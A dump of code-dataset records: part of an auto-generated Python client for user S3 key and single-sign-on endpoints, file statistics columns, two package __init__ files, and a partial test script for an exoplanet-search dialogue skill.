:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: S3Keys
"""
kwargs['_return_http_data_only'] = True
return self.um_users_s3keys_get_with_http_info(user_id, **kwargs) # noqa: E501
def um_users_s3keys_get_with_http_info(self, user_id, **kwargs): # noqa: E501
"""List user S3 keys # noqa: E501
List S3 keys by user ID. The user ID is in the response body when the user is created, and in the list of the users, returned by GET. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3keys_get_with_http_info(user_id, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
:type depth: int
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(S3Keys, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'user_id',
'pretty',
'depth',
'x_contract_number'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth',
'response_type',
'query_params'
]
)
for local_var_params_key, local_var_params_val in six.iteritems(local_var_params['kwargs']):
if local_var_params_key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method um_users_s3keys_get" % local_var_params_key
)
local_var_params[local_var_params_key] = local_var_params_val
del local_var_params['kwargs']
# verify the required parameter 'user_id' is set
if self.api_client.client_side_validation and ('user_id' not in local_var_params or # noqa: E501
local_var_params['user_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_id` when calling `um_users_s3keys_get`") # noqa: E501
if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] > 10: # noqa: E501
raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_get`, must be a value less than or equal to `10`") # noqa: E501
if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] < 0: # noqa: E501
raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_get`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user_id' in local_var_params:
path_params['userId'] = local_var_params['user_id'] # noqa: E501
query_params = list(local_var_params.get('query_params', {}).items())
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'depth' in local_var_params and local_var_params['depth'] is not None: # noqa: E501
query_params.append(('depth', local_var_params['depth'])) # noqa: E501
header_params = {}
if 'x_contract_number' in local_var_params:
header_params['X-Contract-Number'] = local_var_params['x_contract_number'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Basic Authentication', 'Token Authentication'] # noqa: E501
response_type = 'S3Keys'
if 'response_type' in kwargs:
response_type = kwargs['response_type']
return self.api_client.call_api(
'/um/users/{userId}/s3keys', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=response_type, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def um_users_s3keys_post(self, user_id, **kwargs): # noqa: E501
"""Create user S3 keys # noqa: E501
Create an S3 key for the specified user. The user ID is in the response body when the user is created, and in the list of the users, returned by GET. A maximum of five keys per user can be generated. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3keys_post(user_id, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
:type depth: int
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: S3Key
"""
kwargs['_return_http_data_only'] = True
return self.um_users_s3keys_post_with_http_info(user_id, **kwargs) # noqa: E501
def um_users_s3keys_post_with_http_info(self, user_id, **kwargs): # noqa: E501
"""Create user S3 keys # noqa: E501
Create an S3 key for the specified user. The user ID is in the response body when the user is created, and in the list of the users, returned by GET. A maximum of five keys per user can be generated. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3keys_post_with_http_info(user_id, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
:type depth: int
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(S3Key, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'user_id',
'pretty',
'depth',
'x_contract_number'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth',
'response_type',
'query_params'
]
)
for local_var_params_key, local_var_params_val in six.iteritems(local_var_params['kwargs']):
if local_var_params_key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method um_users_s3keys_post" % local_var_params_key
)
local_var_params[local_var_params_key] = local_var_params_val
del local_var_params['kwargs']
# verify the required parameter 'user_id' is set
if self.api_client.client_side_validation and ('user_id' not in local_var_params or # noqa: E501
local_var_params['user_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_id` when calling `um_users_s3keys_post`") # noqa: E501
if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] > 10: # noqa: E501
raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_post`, must be a value less than or equal to `10`") # noqa: E501
if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] < 0: # noqa: E501
raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_post`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user_id' in local_var_params:
path_params['userId'] = local_var_params['user_id'] # noqa: E501
query_params = list(local_var_params.get('query_params', {}).items())
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'depth' in local_var_params and local_var_params['depth'] is not None: # noqa: E501
query_params.append(('depth', local_var_params['depth'])) # noqa: E501
header_params = {}
if 'x_contract_number' in local_var_params:
header_params['X-Contract-Number'] = local_var_params['x_contract_number'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Basic Authentication', 'Token Authentication'] # noqa: E501
response_type = 'S3Key'
if 'response_type' in kwargs:
response_type = kwargs['response_type']
return self.api_client.call_api(
'/um/users/{userId}/s3keys', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=response_type, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def um_users_s3keys_put(self, user_id, key_id, s3_key, **kwargs): # noqa: E501
"""Modify S3 keys by key ID # noqa: E501
Enable or disable the specified user S3 key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3keys_put(user_id, key_id, s3_key, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param key_id: The unique ID of the S3 key. (required)
:type key_id: str
:param s3_key: The modified S3 key. (required)
:type s3_key: S3Key
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
:type depth: int
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: S3Key
"""
kwargs['_return_http_data_only'] = True
return self.um_users_s3keys_put_with_http_info(user_id, key_id, s3_key, **kwargs) # noqa: E501
def um_users_s3keys_put_with_http_info(self, user_id, key_id, s3_key, **kwargs): # noqa: E501
"""Modify S3 keys by key ID # noqa: E501
Enable or disable the specified user S3 key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3keys_put_with_http_info(user_id, key_id, s3_key, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param key_id: The unique ID of the S3 key. (required)
:type key_id: str
:param s3_key: The modified S3 key. (required)
:type s3_key: S3Key
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
:type depth: int
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(S3Key, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'user_id',
'key_id',
's3_key',
'pretty',
'depth',
'x_contract_number'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth',
'response_type',
'query_params'
]
)
for local_var_params_key, local_var_params_val in six.iteritems(local_var_params['kwargs']):
if local_var_params_key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method um_users_s3keys_put" % local_var_params_key
)
local_var_params[local_var_params_key] = local_var_params_val
del local_var_params['kwargs']
# verify the required parameter 'user_id' is set
if self.api_client.client_side_validation and ('user_id' not in local_var_params or # noqa: E501
local_var_params['user_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_id` when calling `um_users_s3keys_put`") # noqa: E501
# verify the required parameter 'key_id' is set
if self.api_client.client_side_validation and ('key_id' not in local_var_params or # noqa: E501
local_var_params['key_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `key_id` when calling `um_users_s3keys_put`") # noqa: E501
# verify the required parameter 's3_key' is set
if self.api_client.client_side_validation and ('s3_key' not in local_var_params or # noqa: E501
local_var_params['s3_key'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `s3_key` when calling `um_users_s3keys_put`") # noqa: E501
if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] > 10: # noqa: E501
raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_put`, must be a value less than or equal to `10`") # noqa: E501
if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] < 0: # noqa: E501
raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_put`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user_id' in local_var_params:
path_params['userId'] = local_var_params['user_id'] # noqa: E501
if 'key_id' in local_var_params:
path_params['keyId'] = local_var_params['key_id'] # noqa: E501
query_params = list(local_var_params.get('query_params', {}).items())
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'depth' in local_var_params and local_var_params['depth'] is not None: # noqa: E501
query_params.append(('depth', local_var_params['depth'])) # noqa: E501
header_params = {}
if 'x_contract_number' in local_var_params:
header_params['X-Contract-Number'] = local_var_params['x_contract_number'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 's3_key' in local_var_params:
body_params = local_var_params['s3_key']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Basic Authentication', 'Token Authentication'] # noqa: E501
response_type = 'S3Key'
if 'response_type' in kwargs:
response_type = kwargs['response_type']
return self.api_client.call_api(
'/um/users/{userId}/s3keys/{keyId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=response_type, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def um_users_s3ssourl_get(self, user_id, **kwargs): # noqa: E501
"""Retrieve S3 single sign-on URLs # noqa: E501
Retrieve S3 Object Storage single sign-on URLs for the the specified user. The user ID is in the response body when the user is created, and in the list of the users, returned by GET. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3ssourl_get(user_id, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: S3ObjectStorageSSO
"""
kwargs['_return_http_data_only'] = True
return self.um_users_s3ssourl_get_with_http_info(user_id, **kwargs) # noqa: E501
def um_users_s3ssourl_get_with_http_info(self, user_id, **kwargs): # noqa: E501
"""Retrieve S3 single sign-on URLs # noqa: E501
Retrieve S3 Object Storage single sign-on URLs for the the specified user. The user ID is in the response body when the user is created, and in the list of the users, returned by GET. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3ssourl_get_with_http_info(user_id, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(S3ObjectStorageSSO, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'user_id',
'pretty',
'x_contract_number'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth',
'response_type',
'query_params'
]
)
for local_var_params_key, local_var_params_val in six.iteritems(local_var_params['kwargs']):
if local_var_params_key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method um_users_s3ssourl_get" % local_var_params_key
)
local_var_params[local_var_params_key] = local_var_params_val
del local_var_params['kwargs']
# verify the required parameter 'user_id' is set
if self.api_client.client_side_validation and ('user_id' not in local_var_params or # noqa: E501
local_var_params['user_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_id` when calling `um_users_s3ssourl_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user_id' in local_var_params:
path_params['userId'] = local_var_params['user_id'] # noqa: E501
query_params = list(local_var_params.get('query_params', {}).items())
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
header_params = {}
if 'x_contract_number' in local_var_params:
header_params['X-Contract-Number'] = local_var_params['x_contract_number'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Basic Authentication', 'Token Authentication'] # noqa: E501
response_type = 'S3ObjectStorageSSO'
if 'response_type' in kwargs:
response_type = kwargs['response_type']
return self.api_client.call_api(
'/um/users/{userId}/s3ssourl', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=response_type, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 55.364786
| 451
| 0.6308
| 7,135
| 56,915
| 4.793553
| 0.031815
| 0.049822
| 0.082276
| 0.021987
| 0.985644
| 0.982837
| 0.982486
| 0.980908
| 0.979446
| 0.977984
| 0
| 0.017122
| 0.297075
| 56,915
| 1,027
| 452
| 55.418695
| 0.837778
| 0.492278
| 0
| 0.785714
| 0
| 0.021008
| 0.22361
| 0.044464
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027311
| false
| 0
| 0.010504
| 0
| 0.065126
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e878330a2e6fbecc53a274ff3c0a08fbec745cc6
| 188
|
py
|
Python
|
animalai/animalai/communicator_objects/__init__.py
|
southpawac/AnimalAI-Olympics
|
efa08a78b2ddad27260c160323a0b20541c13c29
|
[
"Apache-2.0"
] | 607
|
2019-04-30T21:10:58.000Z
|
2022-03-03T16:36:54.000Z
|
animalai/animalai/communicator_objects/__init__.py
|
KacperKazan/AnimalAI-Olympics
|
c2742dc7344e3907980cf7f1b4fabb1ab09c7062
|
[
"Apache-2.0"
] | 75
|
2019-05-02T10:26:28.000Z
|
2022-02-07T03:02:44.000Z
|
animalai/animalai/communicator_objects/__init__.py
|
KacperKazan/AnimalAI-Olympics
|
c2742dc7344e3907980cf7f1b4fabb1ab09c7062
|
[
"Apache-2.0"
] | 109
|
2019-05-01T10:29:35.000Z
|
2022-03-30T07:22:05.000Z
|
from .arenas_configurations_proto_pb2 import *
from .arena_configuration_proto_pb2 import *
from .items_to_spawn_proto_pb2 import *
from .vector_proto_pb2 import *
from .__init__ import *
| 31.333333
| 46
| 0.840426
| 27
| 188
| 5.259259
| 0.481481
| 0.225352
| 0.394366
| 0.507042
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02381
| 0.106383
| 188
| 5
| 47
| 37.6
| 0.821429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e8875795a944b95f9c569bd8cf96341f70c22d0e
| 159
|
py
|
Python
|
doubling_agent/__init__.py
|
lkmartin90/doubling_agent
|
73a7f06aa43c5fa51ea1263b72ebe6f8319bf894
|
[
"MIT"
] | 1
|
2020-12-03T15:47:24.000Z
|
2020-12-03T15:47:24.000Z
|
doubling_agent/__init__.py
|
lkmartin90/doubling_agent
|
73a7f06aa43c5fa51ea1263b72ebe6f8319bf894
|
[
"MIT"
] | null | null | null |
doubling_agent/__init__.py
|
lkmartin90/doubling_agent
|
73a7f06aa43c5fa51ea1263b72ebe6f8319bf894
|
[
"MIT"
] | null | null | null |
from . import basic_functions
from . import motility_functions
from . import common_functions
from . import steve_functions
from . import image_steve_functions
| 31.8
| 35
| 0.849057
| 21
| 159
| 6.142857
| 0.380952
| 0.387597
| 0.589147
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119497
| 159
| 5
| 35
| 31.8
| 0.921429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2cd416b9ef923fdba3d5a3f00e1f04b39c65fe64
| 15,447
|
py
|
Python
|
dff_space_skill/run_test.py
|
SaschaC/mds_skills_hackathon
|
baf8e76adf8e766299dac8c89e41b63a955ef2c1
|
[
"Apache-2.0"
] | null | null | null |
dff_space_skill/run_test.py
|
SaschaC/mds_skills_hackathon
|
baf8e76adf8e766299dac8c89e41b63a955ef2c1
|
[
"Apache-2.0"
] | null | null | null |
dff_space_skill/run_test.py
|
SaschaC/mds_skills_hackathon
|
baf8e76adf8e766299dac8c89e41b63a955ef2c1
|
[
"Apache-2.0"
] | null | null | null |
import random
from scenario.main import actor
import run_interactive
random.seed(314)
# testing
test_set = [
[("hi", "Please enter your search query!"),
("planets with a radius of at most 0.05","""
Normalized NL Query: planets with a radius of at most #num0
XML Queries:['(.//planet[radius<=0.05])[position()<=count(//*)]']
I found the following 13 planets for the query 'planets with a radius of at most 0.05':
Kepler-102 b, KOI-115.03, Kepler-1308 b, Kepler-37 b, Kepler-444 b, Kepler-444 c, Kepler-444 d, Kepler-444 e, Kepler-62 c, Kepler-138 b, Mercury, Mars, Pluto
Would you like more info on one of these planets?
"""
),
("yes", "Alright, for which planet?"),
("KOI-115.03","\n\nKOI-115.03 is an unconfirmed transiting planet orbiting Kepler-105.\n\nWould you like to try another search?\n"),
("no","OK bye!")
],
[("hi", "Please enter your search query!"),("Are there any planets with a radius of at most 0.05?","""
Normalized NL Query: planets with a radius of at most #num0
XML Queries:['(.//planet[radius<=0.05])[position()<=count(//*)]']
I found the following 13 planets for the query 'Are there any planets with a radius of at most 0.05?':
Kepler-102 b, KOI-115.03, Kepler-1308 b, Kepler-37 b, Kepler-444 b, Kepler-444 c, Kepler-444 d, Kepler-444 e, Kepler-62 c, Kepler-138 b, Mercury, Mars, Pluto
Would you like more info on one of these planets?
"""
),
("no", "Would you like to try another search?"),
("no","OK bye!")],
[("hi", "Please enter your search query!"),("Which planets have a radius of at most 0.05?","""
Normalized NL Query: which planets have a radius of at most #num0
XML Queries:['.//planet[radius<=0.05]']
I found the following 13 planets for the query 'Which planets have a radius of at most 0.05?':
Kepler-102 b, KOI-115.03, Kepler-1308 b, Kepler-37 b, Kepler-444 b, Kepler-444 c, Kepler-444 d, Kepler-444 e, Kepler-62 c, Kepler-138 b, Mercury, Mars, Pluto
Would you like more info on one of these planets?
"""
),
("no", "Would you like to try another search?"),
("no","OK bye!")],
[("hi", "Please enter your search query!"),("show me 2 planets with a radius below 0.05","""
Normalized NL Query: #num0 planets with a radius below #num1
XML Queries:['(.//planet[radius<=0.05])[position()<=2]']
I found the following 2 planets for the query 'show me 2 planets with a radius below 0.05':
Kepler-102 b, KOI-115.03
Would you like more info on one of these planets?
"""
),
("no", "Would you like to try another search?"),
("no","OK bye!")],
[("hi", "Please enter your search query!"),("show me 3 planets with a radius of at least 1 and a mass of at most 5 that were discovered before 2020","""
Normalized NL Query: #num0 planets with a radius of at least #num1 and a mass of at most #num2 that were discovered before #num3
XML Queries:['(.//planet[radius>=1 and mass<=5 and discoveryyear<=2020])[position()<=3]']
I found the following 3 planets for the query 'show me 3 planets with a radius of at least 1 and a mass of at most 5 that were discovered before 2020':
51 Eri b, CoRoT-11 b, CoRoT-12 b
Would you like more info on one of these planets?
"""
),
("yes", "Alright, for which planet?"),
("51 Eri b","""
51 Eri b is a directly-imaged exoplanet located at a projected separation of 13.2 AU from its star. The system also exhibits an infrared excess indicating the presence of debris belts at around 5.5 AU and 82 AU from the star. It is a member of the Beta Pictoris moving group.
Would you like to try another search?
"""), ("no","OK bye!")],
[("hi", "Please enter your search query!"),("Show me 1 planet with an age of maximally 0.1 and a mass of at least 1 that was discovered in 2020 and 3 planets that have a radius of at least 1",
"""
Normalized NL Query: #num0 planet with an age of maximally #num1 and a mass of at least #num2 that was discovered in #num3 and #num4 planets that have a radius of at least #num5
XML Queries:['(.//planet[age<=0.1 and mass>=1 and discoveryyear=2020])[position()<=1]', '(.//planet[radius>=1])[position()<=3]']
I did not find any planet for part 1 of the query 'Show me 1 planet with an age of maximally 0.1 and a mass of at least 1 that was discovered in 2020 and 3 planets that have a radius of at least 1'.
Here are 3 planets I found for part 2 of the query 'Show me 1 planet with an age of maximally 0.1 and a mass of at least 1 that was discovered in 2020 and 3 planets that have a radius of at least 1':
1RXS1609 b, 2M 2206-20 b, 2MASS J0219-3925 B
Would you like more info on one of these planets?
"""
),
("no", "Would you like to try another search?"),
("no","OK bye!")],
[("hi", "Please enter your search query!"),("Show me 3 planets that were discovered before 2020 and that have a mass of at least 2 with an age of maximally 5.",
"""
Normalized NL Query: #num0 planets that were discovered before #num1 and that have a mass of at least #num2 with an age of maximally #num3
XML Queries:['(.//planet[discoveryyear<=2020 and mass>=2][age<=5.])[position()<=3]']
I found the following 3 planets for the query 'Show me 3 planets that were discovered before 2020 and that have a mass of at least 2 with an age of maximally 5.':
